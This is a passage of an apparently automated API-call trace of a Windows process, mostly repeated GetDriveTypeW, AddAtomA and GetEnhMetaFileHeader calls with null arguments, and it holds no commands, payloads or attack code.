(lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.142] AddAtomA (lpString=0x0) returned 0x0 [0113.142] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.143] AddAtomA (lpString=0x0) returned 0x0 [0113.143] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.144] AddAtomA (lpString=0x0) returned 0x0 [0113.144] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.145] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.145] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.146] AddAtomA (lpString=0x0) returned 0x0 [0113.146] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.147] AddAtomA (lpString=0x0) returned 0x0 [0113.147] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.148] AddAtomA (lpString=0x0) returned 0x0 [0113.148] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.149] AddAtomA (lpString=0x0) returned 0x0 [0113.149] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.150] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.150] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.151] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.151] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.152] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.152] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.153] AddAtomA (lpString=0x0) returned 0x0 [0113.153] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.154] AddAtomA (lpString=0x0) returned 0x0 [0113.154] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.155] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0113.155] AddAtomA (lpString=0x0) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.324] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | 